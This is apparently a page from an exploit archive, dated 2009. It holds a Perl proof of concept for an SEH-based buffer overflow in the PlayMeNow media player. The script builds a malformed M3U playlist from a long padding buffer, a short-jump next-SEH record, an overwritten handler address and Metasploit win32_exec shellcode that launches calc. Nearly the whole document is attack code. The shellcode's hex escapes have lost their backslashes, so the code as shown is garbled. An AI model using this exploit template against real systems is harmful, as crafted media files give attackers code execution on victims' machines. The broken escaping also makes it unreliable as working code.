PlayMeNow Malformed M3U Playlist Buffer Overflow(SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PlayMeNow Malformed M3U Playlist Buffer Overflow(SEH)
# Published : 2009-12-21
# Author : ThE g0bL!N
# Previous Title : Easy RM to MP3 27.3.700 WinXP SP3
# Next Title : PlayMeNow Malformed M3U Playlist File Buffer

#!/usr/bin/perl
#Greets: His0k4 :) Then His0k4 and After That His0k4
#Special Greets :01000001 01101001 01100011 01101000 01100001 00100000
##################################################################
# win32_exec - EXITFUNC=seh CMD=calc Size=158 Encoder=PexFnstenvMov http://metasploit.com
my $shellcode =
"x6ax22x59xd9xeexd9x74x24xf4x5bx81x73x13x5bx71xf9".
"x90x83xebxfcxe2xf4xa7x99xbdx90x5bx71x72xd5x67xfa".
"x85x95x23x70x16x1bx14x69x72xcfx7bx70x12xd9xd0x45".
"x72x91xb5x40x39x09xf7xf5x39xe4x5cxb0x33x9dx5axb3".
"x12x64x60x25xddx94x2ex94x72xcfx7fx70x12xf6xd0x7d".
"xb2x1bx04x6dxf8x7bxd0x6dx72x91xb0xf8xa5xb4x5fxb2".
"xc8x50x3fxfaxb9xa0xdexb1x81x9cxd0x31xf5x1bx2bx6d".
"x54x1bx33x79x12x99xd0xf1x49x90x5bx71x72xf8x67x2e".
"xc8x66x3bx27x70x68xd8xb1x82xc0x33x81x73x94x04x19".
"x61x6exd1x7fxaex6fxbcx12x98xfcx38x71xf9x90";
my $bof="x42" x 2360;
my $next_seh="xEBx06x90x90";
my $seh="xB8x15xC6x72";
###################################################################
open(myfile,'>>exploit.m3u');
print myfile $bof.$next_seh.$seh.$shellcode;
###################################################################